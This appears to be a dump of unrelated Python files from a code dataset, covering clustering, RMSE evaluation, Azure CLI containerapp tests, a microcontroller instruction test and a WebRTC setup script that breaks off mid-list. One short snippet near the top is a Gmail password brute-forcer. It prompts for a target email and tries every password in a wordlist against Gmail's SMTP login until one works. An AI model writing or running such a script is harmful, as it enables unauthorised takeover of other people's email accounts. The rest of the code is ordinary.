    x = df_candies.drop('competitorname', axis=1)

    # Cluster the same feature matrix with both KMeans variants.
    mini_kmeans_pred = MiniBatchKMeans(n_clusters=4, batch_size=8).fit(x).predict(x)
    print(mini_kmeans_pred)

    kmeans_pred = KMeans(n_clusters=4).fit(x).predict(x)
    print(kmeans_pred)

    # 1 where the two clusterings assign the same label, else 0.
    compare = [1 if a == b else 0 for a, b in zip(mini_kmeans_pred, kmeans_pred)]
    print(compare)
8163208 | import smtplib
file=open("password.txt","r")
target_gmail=input("ENTER THE TARGET EMAIL:")
def brut():
server = smtplib.SMTP('smtp.gmail.com', 587)
server.starttls()
server.login(target_gmail, line)
print("THE PASSWORD IS\n", line)
g=0
for line in file:
if g==1:
break
else:
try:
brut()
break
except smtplib.SMTPAuthenticationError:
print(line,"Wrong")
| StarcoderdataPython |
4910532 | <gh_stars>0
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Aug 13 12:32:57 2019
@author: ghosh128
"""
import sys
sys.path.append("../")
import os
import numpy as np
import config
from scipy import io
from sklearn.metrics import mean_squared_error
from math import sqrt
#%%
print("LOAD DATA")
test_data = np.load(os.path.join(config.NUMPY_DIR, "data_weak_6.npy"))
preds = io.loadmat(os.path.join(config.RESULT_DIR, "IMBALANCED", "COREG", "Y.mat"))["y"]
labels = np.reshape(test_data[:, -2], [-1, 1])
k_RMSE = np.zeros((1,3))
for k in range(1,len(labels),10):
indices = np.argsort(preds[:,0])[::-1]
pred_top_k_rmse = sqrt(mean_squared_error(labels[indices[:k],0], preds[indices[:k],0]))
print("Top K Root Mean Squared Error(Pred):", pred_top_k_rmse)
indices = np.argsort(labels[:,0])[::-1]
true_top_k_rmse = sqrt(mean_squared_error(labels[indices[:k],0], preds[indices[:k],0]))
print("Top K Root Mean Squared Error(True):", true_top_k_rmse)
GM_top_k_rmse = sqrt(pred_top_k_rmse*true_top_k_rmse)
print("Top K Root Mean Squared Error(GM):", GM_top_k_rmse)
k_RMSE = np.vstack((k_RMSE, np.reshape(np.array([pred_top_k_rmse, true_top_k_rmse, GM_top_k_rmse]), (1,-1))))
k_RMSE = k_RMSE[1:,:]
RESULT_DIR = os.path.join(config.RESULT_DIR, "IMBALANCED", "COREG")
if not os.path.exists(RESULT_DIR):
os.makedirs(RESULT_DIR)
np.save(os.path.join(RESULT_DIR, "k_RMSE_6"), k_RMSE)
| StarcoderdataPython |
6588234 |
from .defaults import get_default_config
from .defaults import imagedata_kwargs, optimizer_kwargs, lr_scheduler_kwargs, engine_run_kwargs
from .defaults import get_defeault_exp_name | StarcoderdataPython |
105463 | <filename>src/containerapp/azext_containerapp/tests/latest/test_containerapp_commands.py
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
import os
import time
import unittest
from azure.cli.testsdk.scenario_tests import AllowLargeResponse, live_only
from azure.cli.testsdk import (ScenarioTest, ResourceGroupPreparer, JMESPathCheck)
from msrestazure.tools import parse_resource_id
TEST_DIR = os.path.abspath(os.path.join(os.path.abspath(__file__), '..'))
class ContainerappIdentityTests(ScenarioTest):
    """Live-scenario tests for `az containerapp identity` assign/show/remove
    covering system-assigned, user-assigned, and mixed identities."""

    @AllowLargeResponse(8192)
    @ResourceGroupPreparer(location="eastus2")
    @live_only() # encounters 'CannotOverwriteExistingCassetteException' only when run from recording (passes when run live)
    def test_containerapp_identity_e2e(self, resource_group):
        """System + one user identity: assign both, then remove each in turn."""
        env_name = self.create_random_name(prefix='containerapp-env', length=24)
        ca_name = self.create_random_name(prefix='containerapp', length=24)
        user_identity_name = self.create_random_name(prefix='containerapp', length=24)
        logs_workspace_name = self.create_random_name(prefix='containerapp-env', length=24)

        # A containerapp environment requires a Log Analytics workspace.
        logs_workspace_id = self.cmd('monitor log-analytics workspace create -g {} -n {}'.format(resource_group, logs_workspace_name)).get_output_in_json()["customerId"]
        logs_workspace_key = self.cmd('monitor log-analytics workspace get-shared-keys -g {} -n {}'.format(resource_group, logs_workspace_name)).get_output_in_json()["primarySharedKey"]

        self.cmd('containerapp env create -g {} -n {} --logs-workspace-id {} --logs-workspace-key {}'.format(resource_group, env_name, logs_workspace_id, logs_workspace_key))

        # Poll until the environment leaves the transient "waiting" state.
        containerapp_env = self.cmd('containerapp env show -g {} -n {}'.format(resource_group, env_name)).get_output_in_json()

        while containerapp_env["properties"]["provisioningState"].lower() == "waiting":
            time.sleep(5)

            containerapp_env = self.cmd('containerapp env show -g {} -n {}'.format(resource_group, env_name)).get_output_in_json()

        self.cmd('containerapp create -g {} -n {} --environment {}'.format(resource_group, ca_name, env_name))

        self.cmd('containerapp identity assign --system-assigned -g {} -n {}'.format(resource_group, ca_name), checks=[
            JMESPathCheck('type', 'SystemAssigned'),
        ])

        self.cmd('identity create -g {} -n {}'.format(resource_group, user_identity_name))

        self.cmd('containerapp identity assign --user-assigned {} -g {} -n {}'.format(user_identity_name, resource_group, ca_name), checks=[
            JMESPathCheck('type', 'SystemAssigned, UserAssigned'),
        ])

        self.cmd('containerapp identity show -g {} -n {}'.format(resource_group, ca_name), checks=[
            JMESPathCheck('type', 'SystemAssigned, UserAssigned'),
        ])

        self.cmd('containerapp identity remove --user-assigned {} -g {} -n {}'.format(user_identity_name, resource_group, ca_name), checks=[
            JMESPathCheck('type', 'SystemAssigned'),
        ])

        self.cmd('containerapp identity show -g {} -n {}'.format(resource_group, ca_name), checks=[
            JMESPathCheck('type', 'SystemAssigned'),
        ])

        self.cmd('containerapp identity remove --system-assigned -g {} -n {}'.format(resource_group, ca_name), checks=[
            JMESPathCheck('type', 'None'),
        ])

        self.cmd('containerapp identity show -g {} -n {}'.format(resource_group, ca_name), checks=[
            JMESPathCheck('type', 'None'),
        ])

    @AllowLargeResponse(8192)
    @ResourceGroupPreparer(location="canadacentral")
    def test_containerapp_identity_system(self, resource_group):
        """System-assigned identity only: created with --system-assigned,
        then removed and re-assigned."""
        env_name = self.create_random_name(prefix='containerapp-env', length=24)
        ca_name = self.create_random_name(prefix='containerapp', length=24)
        logs_workspace_name = self.create_random_name(prefix='containerapp-env', length=24)

        logs_workspace_id = self.cmd('monitor log-analytics workspace create -g {} -n {}'.format(resource_group, logs_workspace_name)).get_output_in_json()["customerId"]
        logs_workspace_key = self.cmd('monitor log-analytics workspace get-shared-keys -g {} -n {}'.format(resource_group, logs_workspace_name)).get_output_in_json()["primarySharedKey"]

        self.cmd('containerapp env create -g {} -n {} --logs-workspace-id {} --logs-workspace-key {}'.format(resource_group, env_name, logs_workspace_id, logs_workspace_key))

        # Poll until the environment leaves the transient "waiting" state.
        containerapp_env = self.cmd('containerapp env show -g {} -n {}'.format(resource_group, env_name)).get_output_in_json()

        while containerapp_env["properties"]["provisioningState"].lower() == "waiting":
            time.sleep(5)

            containerapp_env = self.cmd('containerapp env show -g {} -n {}'.format(resource_group, env_name)).get_output_in_json()

        self.cmd('containerapp create -g {} -n {} --environment {} --system-assigned'.format(resource_group, ca_name, env_name))

        self.cmd('containerapp identity show -g {} -n {}'.format(resource_group, ca_name), checks=[
            JMESPathCheck('type', 'SystemAssigned'),
        ])

        self.cmd('containerapp identity remove --system-assigned -g {} -n {}'.format(resource_group, ca_name), checks=[
            JMESPathCheck('type', 'None'),
        ])

        self.cmd('containerapp identity assign --system-assigned -g {} -n {}'.format(resource_group, ca_name), checks=[
            JMESPathCheck('type', 'SystemAssigned'),
        ])

        self.cmd('containerapp identity remove --system-assigned -g {} -n {}'.format(resource_group, ca_name), checks=[
            JMESPathCheck('type', 'None'),
        ])

    @AllowLargeResponse(8192)
    @live_only() # encounters 'CannotOverwriteExistingCassetteException' only when run from recording (passes when run live)
    @ResourceGroupPreparer(location="westeurope")
    def test_containerapp_identity_user(self, resource_group):
        """Two user identities plus system identity; removing one user
        identity leaves the type 'SystemAssigned, UserAssigned'."""
        env_name = self.create_random_name(prefix='containerapp-env', length=24)
        ca_name = self.create_random_name(prefix='containerapp', length=24)
        user_identity_name1 = self.create_random_name(prefix='containerapp-user1', length=24)
        user_identity_name2 = self.create_random_name(prefix='containerapp-user2', length=24)
        logs_workspace_name = self.create_random_name(prefix='containerapp-env', length=24)

        logs_workspace_id = self.cmd('monitor log-analytics workspace create -g {} -n {}'.format(resource_group, logs_workspace_name)).get_output_in_json()["customerId"]
        logs_workspace_key = self.cmd('monitor log-analytics workspace get-shared-keys -g {} -n {}'.format(resource_group, logs_workspace_name)).get_output_in_json()["primarySharedKey"]

        self.cmd('containerapp env create -g {} -n {} --logs-workspace-id {} --logs-workspace-key {}'.format(resource_group, env_name, logs_workspace_id, logs_workspace_key))

        # Poll until the environment leaves the transient "waiting" state.
        containerapp_env = self.cmd('containerapp env show -g {} -n {}'.format(resource_group, env_name)).get_output_in_json()

        while containerapp_env["properties"]["provisioningState"].lower() == "waiting":
            time.sleep(5)

            containerapp_env = self.cmd('containerapp env show -g {} -n {}'.format(resource_group, env_name)).get_output_in_json()

        self.cmd('containerapp create -g {} -n {} --environment {}'.format(resource_group, ca_name, env_name))

        self.cmd('identity create -g {} -n {}'.format(resource_group, user_identity_name1))

        self.cmd('identity create -g {} -n {}'.format(resource_group, user_identity_name2))

        self.cmd('containerapp identity assign --system-assigned -g {} -n {}'.format(resource_group, ca_name), checks=[
            JMESPathCheck('type', 'SystemAssigned'),
        ])

        self.cmd('containerapp identity assign --user-assigned {} {} -g {} -n {}'.format(user_identity_name1, user_identity_name2, resource_group, ca_name), checks=[
            JMESPathCheck('type', 'SystemAssigned, UserAssigned'),
        ])

        self.cmd('containerapp identity show -g {} -n {}'.format(resource_group, ca_name), checks=[
            JMESPathCheck('type', 'SystemAssigned, UserAssigned'),
        ])

        # Removing only one of the two user identities keeps UserAssigned.
        self.cmd('containerapp identity remove --user-assigned {} -g {} -n {}'.format(user_identity_name1, resource_group, ca_name), checks=[
            JMESPathCheck('type', 'SystemAssigned, UserAssigned'),
        ])

        self.cmd('containerapp identity remove --user-assigned {} -g {} -n {}'.format(user_identity_name2, resource_group, ca_name), checks=[
            JMESPathCheck('type', 'SystemAssigned'),
        ])

        self.cmd('containerapp identity show -g {} -n {}'.format(resource_group, ca_name), checks=[
            JMESPathCheck('type', 'SystemAssigned'),
        ])

        self.cmd('containerapp identity remove --system-assigned -g {} -n {}'.format(resource_group, ca_name), checks=[
            JMESPathCheck('type', 'None'),
        ])

        self.cmd('containerapp identity show -g {} -n {}'.format(resource_group, ca_name), checks=[
            JMESPathCheck('type', 'None'),
        ])
class ContainerappIngressTests(ScenarioTest):
    """Live-scenario tests for `az containerapp ingress`, traffic splitting,
    and custom domain / certificate binding."""

    @AllowLargeResponse(8192)
    @ResourceGroupPreparer(location="eastus2")
    def test_containerapp_ingress_e2e(self, resource_group):
        """External ingress on port 80, then disable, then re-enable internal
        on port 81 with http2 and --allow-insecure."""
        env_name = self.create_random_name(prefix='containerapp-env', length=24)
        ca_name = self.create_random_name(prefix='containerapp', length=24)
        logs_workspace_name = self.create_random_name(prefix='containerapp-env', length=24)

        logs_workspace_id = self.cmd('monitor log-analytics workspace create -g {} -n {}'.format(resource_group, logs_workspace_name)).get_output_in_json()["customerId"]
        logs_workspace_key = self.cmd('monitor log-analytics workspace get-shared-keys -g {} -n {}'.format(resource_group, logs_workspace_name)).get_output_in_json()["primarySharedKey"]

        self.cmd('containerapp env create -g {} -n {} --logs-workspace-id {} --logs-workspace-key {}'.format(resource_group, env_name, logs_workspace_id, logs_workspace_key))

        # Poll until the environment leaves the transient "waiting" state.
        containerapp_env = self.cmd('containerapp env show -g {} -n {}'.format(resource_group, env_name)).get_output_in_json()

        while containerapp_env["properties"]["provisioningState"].lower() == "waiting":
            time.sleep(5)

            containerapp_env = self.cmd('containerapp env show -g {} -n {}'.format(resource_group, env_name)).get_output_in_json()

        self.cmd('containerapp create -g {} -n {} --environment {} --ingress external --target-port 80'.format(resource_group, ca_name, env_name))

        # NOTE(review): the format strings below have two placeholders but are
        # given three arguments (env_name is extra, harmlessly ignored).
        self.cmd('containerapp ingress show -g {} -n {}'.format(resource_group, ca_name, env_name), checks=[
            JMESPathCheck('external', True),
            JMESPathCheck('targetPort', 80),
        ])

        self.cmd('containerapp ingress disable -g {} -n {}'.format(resource_group, ca_name, env_name))

        # Disabling ingress should drop the fqdn from the configuration.
        containerapp_def = self.cmd('containerapp show -g {} -n {}'.format(resource_group, ca_name)).get_output_in_json()

        self.assertEqual("fqdn" in containerapp_def["properties"]["configuration"], False)

        self.cmd('containerapp ingress enable -g {} -n {} --type internal --target-port 81 --allow-insecure --transport http2'.format(resource_group, ca_name, env_name))

        self.cmd('containerapp ingress show -g {} -n {}'.format(resource_group, ca_name, env_name), checks=[
            JMESPathCheck('external', False),
            JMESPathCheck('targetPort', 81),
            JMESPathCheck('allowInsecure', True),
            JMESPathCheck('transport', "Http2"),
        ])

        # NOTE(review): this block is an exact duplicate of the check above.
        self.cmd('containerapp ingress show -g {} -n {}'.format(resource_group, ca_name, env_name), checks=[
            JMESPathCheck('external', False),
            JMESPathCheck('targetPort', 81),
            JMESPathCheck('allowInsecure', True),
            JMESPathCheck('transport', "Http2"),
        ])

    @AllowLargeResponse(8192)
    @ResourceGroupPreparer(location="eastus2")
    def test_containerapp_ingress_traffic_e2e(self, resource_group):
        """Traffic splitting: 100% to latest, then 50/50 between latest and a
        named revision; verifies revision trafficWeight."""
        env_name = self.create_random_name(prefix='containerapp-env', length=24)
        ca_name = self.create_random_name(prefix='containerapp', length=24)
        logs_workspace_name = self.create_random_name(prefix='containerapp-env', length=24)

        logs_workspace_id = self.cmd('monitor log-analytics workspace create -g {} -n {}'.format(resource_group, logs_workspace_name)).get_output_in_json()["customerId"]
        logs_workspace_key = self.cmd('monitor log-analytics workspace get-shared-keys -g {} -n {}'.format(resource_group, logs_workspace_name)).get_output_in_json()["primarySharedKey"]

        self.cmd('containerapp env create -g {} -n {} --logs-workspace-id {} --logs-workspace-key {}'.format(resource_group, env_name, logs_workspace_id, logs_workspace_key))

        # Poll until the environment leaves the transient "waiting" state.
        containerapp_env = self.cmd('containerapp env show -g {} -n {}'.format(resource_group, env_name)).get_output_in_json()

        while containerapp_env["properties"]["provisioningState"].lower() == "waiting":
            time.sleep(5)

            containerapp_env = self.cmd('containerapp env show -g {} -n {}'.format(resource_group, env_name)).get_output_in_json()

        self.cmd('containerapp create -g {} -n {} --environment {} --ingress external --target-port 80'.format(resource_group, ca_name, env_name))

        self.cmd('containerapp ingress show -g {} -n {}'.format(resource_group, ca_name), checks=[
            JMESPathCheck('external', True),
            JMESPathCheck('targetPort', 80),
        ])

        self.cmd('containerapp ingress traffic set -g {} -n {} --revision-weight latest=100'.format(resource_group, ca_name), checks=[
            JMESPathCheck('[0].latestRevision', True),
            JMESPathCheck('[0].weight', 100),
        ])

        # Force a new revision by changing resources.
        self.cmd('containerapp update -g {} -n {} --cpu 1.0 --memory 2Gi'.format(resource_group, ca_name))

        revisions_list = self.cmd('containerapp revision list -g {} -n {}'.format(resource_group, ca_name)).get_output_in_json()

        self.cmd('containerapp ingress traffic set -g {} -n {} --revision-weight latest=50 {}=50'.format(resource_group, ca_name, revisions_list[0]["name"]), checks=[
            JMESPathCheck('[0].latestRevision', True),
            JMESPathCheck('[0].weight', 50),
            JMESPathCheck('[1].revisionName', revisions_list[0]["name"]),
            JMESPathCheck('[1].weight', 50),
        ])

        self.cmd('containerapp ingress traffic show -g {} -n {}'.format(resource_group, ca_name), checks=[
            JMESPathCheck('[0].latestRevision', True),
            JMESPathCheck('[0].weight', 50),
            JMESPathCheck('[1].revisionName', revisions_list[0]["name"]),
            JMESPathCheck('[1].weight', 50),
        ])

        # Every revision should now carry a 50% traffic weight.
        revisions_list = self.cmd('containerapp revision list -g {} -n {}'.format(resource_group, ca_name)).get_output_in_json()

        for revision in revisions_list:
            self.assertEqual(revision["properties"]["trafficWeight"], 50)

    @AllowLargeResponse(8192)
    @live_only() # encounters 'CannotOverwriteExistingCassetteException' only when run from recording (passes when run live)
    @ResourceGroupPreparer(location="westeurope")
    def test_containerapp_custom_domains_e2e(self, resource_group):
        """Custom domains: upload a cert, then bind/unbind hostnames by cert
        thumbprint, cert id, and cert name (with/without -e)."""
        env_name = self.create_random_name(prefix='containerapp-env', length=24)
        ca_name = self.create_random_name(prefix='containerapp', length=24)
        logs_workspace_name = self.create_random_name(prefix='containerapp-env', length=24)

        logs_workspace_id = self.cmd('monitor log-analytics workspace create -g {} -n {}'.format(resource_group, logs_workspace_name)).get_output_in_json()["customerId"]
        logs_workspace_key = self.cmd('monitor log-analytics workspace get-shared-keys -g {} -n {}'.format(resource_group, logs_workspace_name)).get_output_in_json()["primarySharedKey"]

        self.cmd('containerapp env create -g {} -n {} --logs-workspace-id {} --logs-workspace-key {}'.format(resource_group, env_name, logs_workspace_id, logs_workspace_key))

        # Poll until the environment leaves the transient "waiting" state.
        containerapp_env = self.cmd('containerapp env show -g {} -n {}'.format(resource_group, env_name)).get_output_in_json()

        while containerapp_env["properties"]["provisioningState"].lower() == "waiting":
            time.sleep(5)

            containerapp_env = self.cmd('containerapp env show -g {} -n {}'.format(resource_group, env_name)).get_output_in_json()

        app = self.cmd('containerapp create -g {} -n {} --environment {} --ingress external --target-port 80'.format(resource_group, ca_name, env_name)).get_output_in_json()

        self.cmd('containerapp hostname list -g {} -n {}'.format(resource_group, ca_name), checks=[
            JMESPathCheck('length(@)', 0),
        ])

        # list hostnames with a wrong location
        # NOTE(review): checks={...} is a *set* literal, not a list; it is
        # effectively unused here because expect_failure=True.
        self.cmd('containerapp hostname list -g {} -n {} -l "{}"'.format(resource_group, ca_name, "eastus2"), checks={
            JMESPathCheck('length(@)', 0),
        }, expect_failure=True)

        # create an App service domain and update its txt records
        contacts = os.path.join(TEST_DIR, 'domain-contact.json')
        zone_name = "{}.com".format(ca_name)
        subdomain_1 = "devtest"
        subdomain_2 = "clitest"
        txt_name_1 = "asuid.{}".format(subdomain_1)
        txt_name_2 = "asuid.{}".format(subdomain_2)
        hostname_1 = "{}.{}".format(subdomain_1, zone_name)
        hostname_2 = "{}.{}".format(subdomain_2, zone_name)
        verification_id = app["properties"]["customDomainVerificationId"]
        self.cmd("appservice domain create -g {} --hostname {} --contact-info=@'{}' --accept-terms".format(resource_group, zone_name, contacts)).get_output_in_json()
        self.cmd('network dns record-set txt add-record -g {} -z {} -n {} -v {}'.format(resource_group, zone_name, txt_name_1, verification_id)).get_output_in_json()
        self.cmd('network dns record-set txt add-record -g {} -z {} -n {} -v {}'.format(resource_group, zone_name, txt_name_2, verification_id)).get_output_in_json()

        # upload cert, add hostname & binding
        pfx_file = os.path.join(TEST_DIR, 'cert.pfx')
        pfx_password = '<PASSWORD>'
        cert_id = self.cmd('containerapp ssl upload -n {} -g {} --environment {} --hostname {} --certificate-file "{}" --password {}'.format(ca_name, resource_group, env_name, hostname_1, pfx_file, pfx_password), checks=[
            JMESPathCheck('[0].name', hostname_1),
        ]).get_output_in_json()[0]["certificateId"]

        self.cmd('containerapp hostname list -g {} -n {}'.format(resource_group, ca_name), checks=[
            JMESPathCheck('length(@)', 1),
            JMESPathCheck('[0].name', hostname_1),
            JMESPathCheck('[0].bindingType', "SniEnabled"),
            JMESPathCheck('[0].certificateId', cert_id),
        ])

        # get cert thumbprint
        cert_thumbprint = self.cmd('containerapp env certificate list -n {} -g {} -c {}'.format(env_name, resource_group, cert_id), checks=[
            JMESPathCheck('length(@)', 1),
            JMESPathCheck('[0].id', cert_id),
        ]).get_output_in_json()[0]["properties"]["thumbprint"]

        # add binding by cert thumbprint
        # Without -e the bind is expected to fail; with -e it succeeds.
        self.cmd('containerapp hostname bind -g {} -n {} --hostname {} --thumbprint {}'.format(resource_group, ca_name, hostname_2, cert_thumbprint), expect_failure=True)

        self.cmd('containerapp hostname bind -g {} -n {} --hostname {} --thumbprint {} -e {}'.format(resource_group, ca_name, hostname_2, cert_thumbprint, env_name), checks=[
            JMESPathCheck('length(@)', 2),
        ])

        self.cmd('containerapp hostname list -g {} -n {}'.format(resource_group, ca_name), checks=[
            JMESPathCheck('length(@)', 2),
            JMESPathCheck('[0].bindingType', "SniEnabled"),
            JMESPathCheck('[0].certificateId', cert_id),
            JMESPathCheck('[1].bindingType', "SniEnabled"),
            JMESPathCheck('[1].certificateId', cert_id),
        ])

        # delete hostname with a wrong location
        self.cmd('containerapp hostname delete -g {} -n {} --hostname {} -l "{}" --yes'.format(resource_group, ca_name, hostname_1, "eastus2"), expect_failure=True)

        self.cmd('containerapp hostname delete -g {} -n {} --hostname {} -l "{}" --yes'.format(resource_group, ca_name, hostname_1, app["location"]), checks=[
            JMESPathCheck('length(@)', 1),
            JMESPathCheck('[0].name', hostname_2),
            JMESPathCheck('[0].bindingType', "SniEnabled"),
            JMESPathCheck('[0].certificateId', cert_id),
        ]).get_output_in_json()

        self.cmd('containerapp hostname list -g {} -n {}'.format(resource_group, ca_name), checks=[
            JMESPathCheck('length(@)', 1),
            JMESPathCheck('[0].name', hostname_2),
            JMESPathCheck('[0].bindingType', "SniEnabled"),
            JMESPathCheck('[0].certificateId', cert_id),
        ])

        self.cmd('containerapp hostname delete -g {} -n {} --hostname {} --yes'.format(resource_group, ca_name, hostname_2), checks=[
            JMESPathCheck('length(@)', 0),
        ]).get_output_in_json()

        # add binding by cert id
        self.cmd('containerapp hostname bind -g {} -n {} --hostname {} --certificate {}'.format(resource_group, ca_name, hostname_2, cert_id), checks=[
            JMESPathCheck('length(@)', 1),
            JMESPathCheck('[0].bindingType', "SniEnabled"),
            JMESPathCheck('[0].certificateId', cert_id),
            JMESPathCheck('[0].name', hostname_2),
        ]).get_output_in_json()

        self.cmd('containerapp hostname delete -g {} -n {} --hostname {} --yes'.format(resource_group, ca_name, hostname_2), checks=[
            JMESPathCheck('length(@)', 0),
        ]).get_output_in_json()

        # add binding by cert name, with and without environment
        cert_name = parse_resource_id(cert_id)["resource_name"]

        self.cmd('containerapp hostname bind -g {} -n {} --hostname {} --certificate {}'.format(resource_group, ca_name, hostname_1, cert_name), expect_failure=True)

        self.cmd('containerapp hostname bind -g {} -n {} --hostname {} --certificate {} -e {}'.format(resource_group, ca_name, hostname_1, cert_name, env_name), checks=[
            JMESPathCheck('length(@)', 1),
            JMESPathCheck('[0].bindingType', "SniEnabled"),
            JMESPathCheck('[0].certificateId', cert_id),
            JMESPathCheck('[0].name', hostname_1),
        ]).get_output_in_json()

        self.cmd('containerapp hostname delete -g {} -n {} --hostname {} --yes'.format(resource_group, ca_name, hostname_1), checks=[
            JMESPathCheck('length(@)', 0),
        ]).get_output_in_json()
class ContainerappDaprTests(ScenarioTest):
    """Live-scenario tests for `az containerapp dapr enable/disable`."""

    @AllowLargeResponse(8192)
    @ResourceGroupPreparer(location="eastus2")
    def test_containerapp_dapr_e2e(self, resource_group):
        """Enable dapr with app id/port/protocol, verify via show, then
        disable and verify the settings are retained but disabled."""
        env_name = self.create_random_name(prefix='containerapp-env', length=24)
        ca_name = self.create_random_name(prefix='containerapp', length=24)
        logs_workspace_name = self.create_random_name(prefix='containerapp-env', length=24)

        logs_workspace_id = self.cmd('monitor log-analytics workspace create -g {} -n {}'.format(resource_group, logs_workspace_name)).get_output_in_json()["customerId"]
        logs_workspace_key = self.cmd('monitor log-analytics workspace get-shared-keys -g {} -n {}'.format(resource_group, logs_workspace_name)).get_output_in_json()["primarySharedKey"]

        self.cmd('containerapp env create -g {} -n {} --logs-workspace-id {} --logs-workspace-key {}'.format(resource_group, env_name, logs_workspace_id, logs_workspace_key))

        # Poll until the environment leaves the transient "waiting" state.
        containerapp_env = self.cmd('containerapp env show -g {} -n {}'.format(resource_group, env_name)).get_output_in_json()

        while containerapp_env["properties"]["provisioningState"].lower() == "waiting":
            time.sleep(5)

            containerapp_env = self.cmd('containerapp env show -g {} -n {}'.format(resource_group, env_name)).get_output_in_json()

        self.cmd('containerapp create -g {} -n {} --environment {}'.format(resource_group, ca_name, env_name))

        # NOTE(review): these format strings take two placeholders but are
        # passed three arguments (env_name is extra, harmlessly ignored).
        self.cmd('containerapp dapr enable -g {} -n {} --dapr-app-id containerapp1 --dapr-app-port 80 --dapr-app-protocol http'.format(resource_group, ca_name, env_name), checks=[
            JMESPathCheck('appId', "containerapp1"),
            JMESPathCheck('appPort', 80),
            JMESPathCheck('appProtocol', "http"),
            JMESPathCheck('enabled', True),
        ])

        self.cmd('containerapp show -g {} -n {}'.format(resource_group, ca_name), checks=[
            JMESPathCheck('properties.configuration.dapr.appId', "containerapp1"),
            JMESPathCheck('properties.configuration.dapr.appPort', 80),
            JMESPathCheck('properties.configuration.dapr.appProtocol', "http"),
            JMESPathCheck('properties.configuration.dapr.enabled', True),
        ])

        self.cmd('containerapp dapr disable -g {} -n {}'.format(resource_group, ca_name, env_name), checks=[
            JMESPathCheck('appId', "containerapp1"),
            JMESPathCheck('appPort', 80),
            JMESPathCheck('appProtocol', "http"),
            JMESPathCheck('enabled', False),
        ])

        self.cmd('containerapp show -g {} -n {}'.format(resource_group, ca_name), checks=[
            JMESPathCheck('properties.configuration.dapr.appId', "containerapp1"),
            JMESPathCheck('properties.configuration.dapr.appPort', 80),
            JMESPathCheck('properties.configuration.dapr.appProtocol', "http"),
            JMESPathCheck('properties.configuration.dapr.enabled', False),
        ])
class ContainerappEnvStorageTests(ScenarioTest):
    """Live-scenario tests for `az containerapp env storage` (Azure Files
    mounts on a containerapp environment)."""

    @AllowLargeResponse(8192)
    @ResourceGroupPreparer(location="eastus")
    def test_containerapp_env_storage(self, resource_group):
        """Create a storage account + file share, attach it to the env as
        read-only storage, then show/list/remove it."""
        env_name = self.create_random_name(prefix='containerapp-env', length=24)
        storage_name = self.create_random_name(prefix='storage', length=24)
        shares_name = self.create_random_name(prefix='share', length=24)
        logs_workspace_name = self.create_random_name(prefix='containerapp-env', length=24)

        logs_workspace_id = self.cmd('monitor log-analytics workspace create -g {} -n {}'.format(resource_group, logs_workspace_name)).get_output_in_json()["customerId"]
        logs_workspace_key = self.cmd('monitor log-analytics workspace get-shared-keys -g {} -n {}'.format(resource_group, logs_workspace_name)).get_output_in_json()["primarySharedKey"]

        self.cmd('containerapp env create -g {} -n {} --logs-workspace-id {} --logs-workspace-key {}'.format(resource_group, env_name, logs_workspace_id, logs_workspace_key))

        # Poll until the environment leaves the transient "waiting" state.
        containerapp_env = self.cmd('containerapp env show -g {} -n {}'.format(resource_group, env_name)).get_output_in_json()

        while containerapp_env["properties"]["provisioningState"].lower() == "waiting":
            time.sleep(5)

            containerapp_env = self.cmd('containerapp env show -g {} -n {}'.format(resource_group, env_name)).get_output_in_json()

        self.cmd('storage account create -g {} -n {} --kind StorageV2 --sku Standard_ZRS --enable-large-file-share'.format(resource_group, storage_name))
        self.cmd('storage share-rm create -g {} -n {} --storage-account {} --access-tier "TransactionOptimized" --quota 1024'.format(resource_group, shares_name, storage_name))

        # NOTE(review): this command string keeps a stray leading 'az ',
        # unlike every other self.cmd call in the file.
        storage_keys = self.cmd('az storage account keys list -g {} -n {}'.format(resource_group, storage_name)).get_output_in_json()[0]

        self.cmd('containerapp env storage set -g {} -n {} --storage-name {} --azure-file-account-name {} --azure-file-account-key {} --access-mode ReadOnly --azure-file-share-name {}'.format(resource_group, env_name, storage_name, storage_name, storage_keys["value"], shares_name), checks=[
            JMESPathCheck('name', storage_name),
        ])

        self.cmd('containerapp env storage show -g {} -n {} --storage-name {}'.format(resource_group, env_name, storage_name), checks=[
            JMESPathCheck('name', storage_name),
        ])

        self.cmd('containerapp env storage list -g {} -n {}'.format(resource_group, env_name), checks=[
            JMESPathCheck('[0].name', storage_name),
        ])

        self.cmd('containerapp env storage remove -g {} -n {} --storage-name {} --yes'.format(resource_group, env_name, storage_name))

        self.cmd('containerapp env storage list -g {} -n {}'.format(resource_group, env_name), checks=[
            JMESPathCheck('length(@)', 0),
        ])
| StarcoderdataPython |
9632801 | #########################################################
# 2020-01-23 23:25:05
# AI
# ins: CPL A
#########################################################
from .. import testutil as u
from ..asmconst import *
p = u.create_test()
for value in range(0x100):
p += atl.move(SFR_A, atl.I(value))
p += "CPL A"
p += atl.aste(SFR_A, atl.I((~value) & 0xFF))
| StarcoderdataPython |
8057901 | <gh_stars>0
#!/usr/bin/env python
# Copyright (C) <2018> Intel Corporation
#
# SPDX-License-Identifier: Apache-2.0
"""
Prepare development environment.
"""
import os
import shutil
import sys
import subprocess
# Repository layout: this script lives one level below the checkout root.
HOME_PATH = os.path.abspath(os.path.join(os.path.dirname(__file__), ".."))
# Directory containing the OWT patch files applied by _patch().
PATCH_PATH = os.path.join(HOME_PATH, 'talk', 'owt', 'patches')
TESTING_PATH = os.path.join(HOME_PATH, 'testing')
THIRD_PARTY_PATH = os.path.join(HOME_PATH, 'third_party')
LIBSRTP_PATH = os.path.join(THIRD_PARTY_PATH, 'libsrtp')
WEBRTC_OVERRIDES_PATH = os.path.join(THIRD_PARTY_PATH, 'webrtc_overrides')
BUILD_PATH = os.path.join(HOME_PATH, 'build')
BASE_PATH = os.path.join(HOME_PATH, 'base')
platform = os.name
# On Windows ('nt'), subprocess calls need shell=True for git to resolve.
useShell = False
if(platform == "nt"):
    useShell = True
def _patch():
    """Apply the local OWT patch set to the checked-out repositories.

    Each patch is applied with ``git am`` in its target repository.  If the
    apply fails (typically because the patch was already applied), the
    in-progress ``git am`` is aborted with ``--skip`` so the working tree is
    left in a clean state -- the same recovery the original copy-pasted
    stanzas performed for every patch.
    """
    # (patch file name, repository the patch applies to), in apply order.
    patches = [
        ('0001-Use-OpenSSL-for-usrsctp.patch', THIRD_PARTY_PATH),
        ('0002-Use-OpenSSL-for-libsrtp.patch', LIBSRTP_PATH),
